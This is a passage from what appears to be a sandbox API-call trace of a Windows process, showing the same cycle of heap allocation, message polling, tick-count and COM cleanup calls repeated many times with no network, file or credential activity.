Size=0x18) returned 0x2632128 [0066.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.445] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.445] GetTickCount () returned 0x1d23c [0066.445] GetTickCount () returned 0x1d23c [0066.445] CoFreeUnusedLibraries () [0066.445] GetTickCount () returned 0x1d23c [0066.445] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.445] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.445] GetTickCount () returned 0x1d23c [0066.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.445] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.445] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.446] GetTickCount () returned 0x1d23c [0066.446] GetTickCount () returned 0x1d23c [0066.446] CoFreeUnusedLibraries () [0066.446] GetTickCount () returned 0x1d23c [0066.446] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.446] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.446] GetTickCount () returned 0x1d23c [0066.446] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.446] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.446] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.446] GetTickCount () returned 0x1d23c [0066.446] GetTickCount () returned 0x1d23c [0066.446] CoFreeUnusedLibraries () [0066.446] GetTickCount () returned 0x1d23c [0066.446] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.446] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.446] GetTickCount () returned 0x1d23c [0066.446] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.446] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.446] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.446] GetTickCount () returned 0x1d23c [0066.446] GetTickCount () returned 0x1d23c [0066.446] CoFreeUnusedLibraries () [0066.446] GetTickCount () returned 0x1d23c [0066.446] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.446] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.446] GetTickCount () returned 0x1d23c [0066.447] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.447] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.447] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.447] GetTickCount () returned 0x1d23c [0066.447] GetTickCount () returned 0x1d23c [0066.447] CoFreeUnusedLibraries () [0066.447] GetTickCount () returned 0x1d23c [0066.447] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.447] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.447] GetTickCount () returned 0x1d23c [0066.447] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.447] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.447] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.447] GetTickCount () returned 0x1d23c [0066.447] GetTickCount () returned 0x1d23c [0066.447] CoFreeUnusedLibraries () [0066.447] GetTickCount () returned 0x1d23c [0066.447] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.447] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.447] GetTickCount () returned 0x1d23c [0066.447] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.447] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.447] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.447] GetTickCount () returned 0x1d23c [0066.448] GetTickCount () returned 0x1d23c [0066.448] CoFreeUnusedLibraries () [0066.448] GetTickCount () returned 0x1d23c [0066.448] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.448] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.448] GetTickCount () returned 0x1d23c [0066.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.448] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.448] GetTickCount () returned 0x1d23c [0066.448] GetTickCount () returned 0x1d23c [0066.448] CoFreeUnusedLibraries () [0066.448] GetTickCount () returned 0x1d23c [0066.448] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.448] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.448] GetTickCount () returned 0x1d23c [0066.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.448] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.448] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.448] GetTickCount () returned 0x1d23c [0066.448] GetTickCount () returned 0x1d23c [0066.448] CoFreeUnusedLibraries () [0066.448] GetTickCount () returned 0x1d23c [0066.448] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.448] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.448] GetTickCount () returned 0x1d23c [0066.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.449] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.449] GetTickCount () returned 0x1d23c [0066.449] GetTickCount () returned 0x1d23c [0066.449] CoFreeUnusedLibraries () [0066.449] GetTickCount () returned 0x1d23c [0066.449] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.449] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.449] GetTickCount () returned 0x1d23c [0066.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.449] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.449] GetTickCount () returned 0x1d23c [0066.449] GetTickCount () returned 0x1d23c [0066.449] CoFreeUnusedLibraries () [0066.449] GetTickCount () returned 0x1d23c [0066.449] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.449] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.449] GetTickCount () returned 0x1d23c [0066.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.449] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.449] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.449] GetTickCount () returned 0x1d23c [0066.449] GetTickCount () returned 0x1d23c [0066.450] CoFreeUnusedLibraries () [0066.450] GetTickCount () returned 0x1d23c [0066.450] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.450] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.450] GetTickCount () returned 0x1d23c [0066.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.450] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.450] GetTickCount () returned 0x1d23c [0066.450] GetTickCount () returned 0x1d23c [0066.450] CoFreeUnusedLibraries () [0066.450] GetTickCount () returned 0x1d23c [0066.450] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.450] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.450] GetTickCount () returned 0x1d23c [0066.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.450] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.450] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.450] GetTickCount () returned 0x1d23c [0066.450] GetTickCount () returned 0x1d23c [0066.450] CoFreeUnusedLibraries () [0066.450] GetTickCount () returned 0x1d23c [0066.450] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.450] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.450] GetTickCount () returned 0x1d23c [0066.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.451] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.451] GetTickCount () returned 0x1d23c [0066.451] GetTickCount () returned 0x1d23c [0066.451] CoFreeUnusedLibraries () [0066.451] GetTickCount () returned 0x1d23c [0066.451] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.451] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.451] GetTickCount () returned 0x1d23c [0066.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.451] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.451] GetTickCount () returned 0x1d23c [0066.451] GetTickCount () returned 0x1d23c [0066.451] CoFreeUnusedLibraries () [0066.451] GetTickCount () returned 0x1d23c [0066.451] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.451] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.451] GetTickCount () returned 0x1d23c [0066.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.451] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.451] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.451] GetTickCount () returned 0x1d23c [0066.451] GetTickCount () returned 0x1d23c [0066.451] CoFreeUnusedLibraries () [0066.451] GetTickCount () returned 0x1d23c [0066.452] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.452] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.452] GetTickCount () returned 0x1d23c [0066.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.452] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.452] GetTickCount () returned 0x1d23c [0066.452] GetTickCount () returned 0x1d23c [0066.452] CoFreeUnusedLibraries () [0066.452] GetTickCount () returned 0x1d23c [0066.452] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.452] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.452] GetTickCount () returned 0x1d23c [0066.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.452] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.452] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.452] GetTickCount () returned 0x1d23c [0066.452] GetTickCount () returned 0x1d23c [0066.452] CoFreeUnusedLibraries () [0066.452] GetTickCount () returned 0x1d23c [0066.452] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.452] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.452] GetTickCount () returned 0x1d23c [0066.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.453] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.453] GetTickCount () returned 0x1d23c [0066.453] GetTickCount () returned 0x1d23c [0066.453] CoFreeUnusedLibraries () [0066.453] GetTickCount () returned 0x1d23c [0066.453] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.453] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.453] GetTickCount () returned 0x1d23c [0066.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.453] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.453] GetTickCount () returned 0x1d24b [0066.453] GetTickCount () returned 0x1d24b [0066.453] CoFreeUnusedLibraries () [0066.453] GetTickCount () returned 0x1d24b [0066.453] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.453] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.453] GetTickCount () returned 0x1d24b [0066.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.453] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.453] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.453] GetTickCount () returned 0x1d24b [0066.453] GetTickCount () returned 0x1d24b [0066.453] CoFreeUnusedLibraries () [0066.453] GetTickCount () returned 0x1d24b [0066.454] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.454] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.454] GetTickCount () returned 0x1d24b [0066.454] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.454] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.454] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.454] GetTickCount () returned 0x1d24b [0066.454] GetTickCount () returned 0x1d24b [0066.454] CoFreeUnusedLibraries () [0066.454] GetTickCount () returned 0x1d24b [0066.454] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.454] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.454] GetTickCount () returned 0x1d24b [0066.454] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.454] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.454] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.454] GetTickCount () returned 0x1d24b [0066.454] GetTickCount () returned 0x1d24b [0066.454] CoFreeUnusedLibraries () [0066.454] GetTickCount () returned 0x1d24b [0066.454] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.454] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.454] GetTickCount () returned 0x1d24b [0066.454] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.455] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.455] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.455] GetTickCount () returned 0x1d24b [0066.455] GetTickCount () returned 0x1d24b [0066.455] CoFreeUnusedLibraries () [0066.455] GetTickCount () returned 0x1d24b [0066.455] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.455] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.455] GetTickCount () returned 0x1d24b [0066.455] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.455] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.455] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.455] GetTickCount () returned 0x1d24b [0066.455] GetTickCount () returned 0x1d24b [0066.455] CoFreeUnusedLibraries () [0066.455] GetTickCount () returned 0x1d24b [0066.455] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.455] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.455] GetTickCount () returned 0x1d24b [0066.455] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.455] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.455] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.455] GetTickCount () returned 0x1d24b [0066.455] GetTickCount () returned 0x1d24b [0066.455] CoFreeUnusedLibraries () [0066.455] GetTickCount () returned 0x1d24b [0066.455] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.455] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.455] GetTickCount () returned 0x1d24b [0066.456] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.456] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.456] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.456] GetTickCount () returned 0x1d24b [0066.456] GetTickCount () returned 0x1d24b [0066.456] CoFreeUnusedLibraries () [0066.456] GetTickCount () returned 0x1d24b [0066.456] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.456] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.456] GetTickCount () returned 0x1d24b [0066.456] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.456] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.456] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.456] GetTickCount () returned 0x1d24b [0066.456] GetTickCount () returned 0x1d24b [0066.456] CoFreeUnusedLibraries () [0066.456] GetTickCount () returned 0x1d24b [0066.456] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.456] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.456] GetTickCount () returned 0x1d24b [0066.456] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.456] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.456] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.456] GetTickCount () returned 0x1d24b [0066.456] GetTickCount () returned 0x1d24b [0066.457] CoFreeUnusedLibraries () [0066.457] GetTickCount () returned 0x1d24b [0066.457] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.457] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.457] GetTickCount () returned 0x1d24b [0066.457] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.457] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.457] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.457] GetTickCount () returned 0x1d24b [0066.457] GetTickCount () returned 0x1d24b [0066.457] CoFreeUnusedLibraries () [0066.457] GetTickCount () returned 0x1d24b [0066.457] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.457] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.457] GetTickCount () returned 0x1d24b [0066.457] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.457] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.457] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.457] GetTickCount () returned 0x1d24b [0066.457] GetTickCount () returned 0x1d24b [0066.457] CoFreeUnusedLibraries () [0066.457] GetTickCount () returned 0x1d24b [0066.457] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.457] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.457] GetTickCount () returned 0x1d24b [0066.458] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.458] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.458] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.458] GetTickCount () returned 0x1d24b [0066.458] GetTickCount () returned 0x1d24b [0066.458] CoFreeUnusedLibraries () [0066.458] GetTickCount () returned 0x1d24b [0066.458] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2635620 | out: hHeap=0x2620000) returned 1 [0066.458] HeapFree (in: hHeap=0x2620000, dwFlags=0x0, lpMem=0x2632128 | out: hHeap=0x2620000) returned 1 [0066.458] GetTickCount () returned 0x1d24b [0066.458] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x8, Size=0x18) returned 0x2632128 [0066.458] RtlAllocateHeap (HeapHandle=0x2620000, Flags=0x0, Size=0xc) returned 0x2635620 [0066.458] PeekMessageA (in: lpMsg=0x18fc40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x18fc40) returned 0 [0066.458] GetTickCount () returned 0x1d24b [0066.458] GetTickCount () returned 0x1d24b [0066.458] CoFreeUnusedLibraries () [0066.458] GetTickCount () returned 0x1d24b [0066.458] HeapFree (in: hHeap=0x2620000, 